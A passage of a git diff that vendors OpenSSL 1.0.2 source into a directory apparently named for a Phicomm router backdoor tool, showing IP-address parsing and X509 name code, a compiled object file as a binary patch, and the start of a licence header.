+    *p++ = 0;
+
+    iplen1 = a2i_ipadd(ipout, iptmp);
+
+    if (!iplen1)
+        goto err;
+
+    iplen2 = a2i_ipadd(ipout + iplen1, p);
+
+    OPENSSL_free(iptmp);
+    iptmp = NULL;
+
+    if (!iplen2 || (iplen1 != iplen2))
+        goto err;
+
+    ret = ASN1_OCTET_STRING_new();
+    if (!ret)
+        goto err;
+    if (!ASN1_OCTET_STRING_set(ret, ipout, iplen1 + iplen2))
+        goto err;
+
+    return ret;
+
+ err:
+    if (iptmp)
+        OPENSSL_free(iptmp);
+    if (ret)
+        ASN1_OCTET_STRING_free(ret);
+    return NULL;
+}
+
+int a2i_ipadd(unsigned char *ipout, const char *ipasc)
+{
+    /* If string contains a ':' assume IPv6 */
+
+    if (strchr(ipasc, ':')) {
+        if (!ipv6_from_asc(ipout, ipasc))
+            return 0;
+        return 16;
+    } else {
+        if (!ipv4_from_asc(ipout, ipasc))
+            return 0;
+        return 4;
+    }
+}
+
+static int ipv4_from_asc(unsigned char *v4, const char *in)
+{
+    int a0, a1, a2, a3;
+    if (sscanf(in, "%d.%d.%d.%d", &a0, &a1, &a2, &a3) != 4)
+        return 0;
+    if ((a0 < 0) || (a0 > 255) || (a1 < 0) || (a1 > 255)
+        || (a2 < 0) || (a2 > 255) || (a3 < 0) || (a3 > 255))
+        return 0;
+    v4[0] = a0;
+    v4[1] = a1;
+    v4[2] = a2;
+    v4[3] = a3;
+    return 1;
+}
+
+typedef struct {
+    /* Temporary store for IPV6 output */
+    unsigned char tmp[16];
+    /* Total number of bytes in tmp */
+    int total;
+    /* The position of a zero (corresponding to '::') */
+    int zero_pos;
+    /* Number of zeroes */
+    int zero_cnt;
+} IPV6_STAT;
+
+static int ipv6_from_asc(unsigned char *v6, const char *in)
+{
+    IPV6_STAT v6stat;
+    v6stat.total = 0;
+    v6stat.zero_pos = -1;
+    v6stat.zero_cnt = 0;
+    /*
+     * Treat the IPv6 representation as a list of values separated by ':'.
+     * The presence of a '::' will parse as one, two or three zero length
+     * elements.
+     */
+    if (!CONF_parse_list(in, ':', 0, ipv6_cb, &v6stat))
+        return 0;
+
+    /* Now for some sanity checks */
+
+    if (v6stat.zero_pos == -1) {
+        /* If no '::' must have exactly 16 bytes */
+        if (v6stat.total != 16)
+            return 0;
+    } else {
+        /* If '::' must have less than 16 bytes */
+        if (v6stat.total == 16)
+            return 0;
+        /* More than three zeroes is an error */
+        if (v6stat.zero_cnt > 3)
+            return 0;
+        /* Can only have three zeroes if nothing else present */
+        else if (v6stat.zero_cnt == 3) {
+            if (v6stat.total > 0)
+                return 0;
+        }
+        /* Can only have two zeroes if at start or end */
+        else if (v6stat.zero_cnt == 2) {
+            if ((v6stat.zero_pos != 0)
+                && (v6stat.zero_pos != v6stat.total))
+                return 0;
+        } else
+            /* Can only have one zero if *not* start or end */
+        {
+            if ((v6stat.zero_pos == 0)
+                || (v6stat.zero_pos == v6stat.total))
+                return 0;
+        }
+    }
+
+    /* Format result */
+
+    if (v6stat.zero_pos >= 0) {
+        /* Copy initial part */
+        memcpy(v6, v6stat.tmp, v6stat.zero_pos);
+        /* Zero middle */
+        memset(v6 + v6stat.zero_pos, 0, 16 - v6stat.total);
+        /* Copy final part */
+        if (v6stat.total != v6stat.zero_pos)
+            memcpy(v6 + v6stat.zero_pos + 16 - v6stat.total,
+                   v6stat.tmp + v6stat.zero_pos,
+                   v6stat.total - v6stat.zero_pos);
+    } else
+        memcpy(v6, v6stat.tmp, 16);
+
+    return 1;
+}
+
+static int ipv6_cb(const char *elem, int len, void *usr)
+{
+    IPV6_STAT *s = usr;
+    /* Error if 16 bytes written */
+    if (s->total == 16)
+        return 0;
+    if (len == 0) {
+        /* Zero length element, corresponds to '::' */
+        if (s->zero_pos == -1)
+            s->zero_pos = s->total;
+        /* If we've already got a :: its an error */
+        else if (s->zero_pos != s->total)
+            return 0;
+        s->zero_cnt++;
+    } else {
+        /* If more than 4 characters could be final a.b.c.d form */
+        if (len > 4) {
+            /* Need at least 4 bytes left */
+            if (s->total > 12)
+                return 0;
+            /* Must be end of string */
+            if (elem[len])
+                return 0;
+            if (!ipv4_from_asc(s->tmp + s->total, elem))
+                return 0;
+            s->total += 4;
+        } else {
+            if (!ipv6_hex(s->tmp + s->total, elem, len))
+                return 0;
+            s->total += 2;
+        }
+    }
+    return 1;
+}
+
+/*
+ * Convert a string of up to 4 hex digits into the corresponding IPv6 form.
+ */
+
+static int ipv6_hex(unsigned char *out, const char *in, int inlen)
+{
+    unsigned char c;
+    unsigned int num = 0;
+    if (inlen > 4)
+        return 0;
+    while (inlen--) {
+        c = *in++;
+        num <<= 4;
+        if ((c >= '0') && (c <= '9'))
+            num |= c - '0';
+        else if ((c >= 'A') && (c <= 'F'))
+            num |= c - 'A' + 10;
+        else if ((c >= 'a') && (c <= 'f'))
+            num |= c - 'a' + 10;
+        else
+            return 0;
+    }
+    out[0] = num >> 8;
+    out[1] = num & 0xff;
+    return 1;
+}
+
+int X509V3_NAME_from_section(X509_NAME *nm, STACK_OF(CONF_VALUE) *dn_sk,
+                             unsigned long chtype)
+{
+    CONF_VALUE *v;
+    int i, mval;
+    char *p, *type;
+    if (!nm)
+        return 0;
+
+    for (i = 0; i < sk_CONF_VALUE_num(dn_sk); i++) {
+        v = sk_CONF_VALUE_value(dn_sk, i);
+        type = v->name;
+        /*
+         * Skip past any leading X. X: X, etc to allow for multiple instances
+         */
+        for (p = type; *p; p++)
+#ifndef CHARSET_EBCDIC
+            if ((*p == ':') || (*p == ',') || (*p == '.'))
+#else
+            if ((*p == os_toascii[':']) || (*p == os_toascii[','])
+                || (*p == os_toascii['.']))
+#endif
+            {
+                p++;
+                if (*p)
+                    type = p;
+                break;
+            }
+#ifndef CHARSET_EBCDIC
+        if (*type == '+')
+#else
+        if (*type == os_toascii['+'])
+#endif
+        {
+            mval = -1;
+            type++;
+        } else
+            mval = 0;
+        if (!X509_NAME_add_entry_by_txt(nm, type, chtype,
+                                        (unsigned char *)v->value, -1, -1,
+                                        mval))
+            return 0;
+
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_utl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_utl.o
new file mode 100644
index 0000000000000000000000000000000000000000..e5c56a523bba3c1e70067fa4655469a51623f600
GIT binary patch
literal 19608
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3conf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3conf.c
new file mode 100644
index 0000000..41aa266
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3conf.c
@@ -0,0 +1,129 @@
+/* v3conf.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
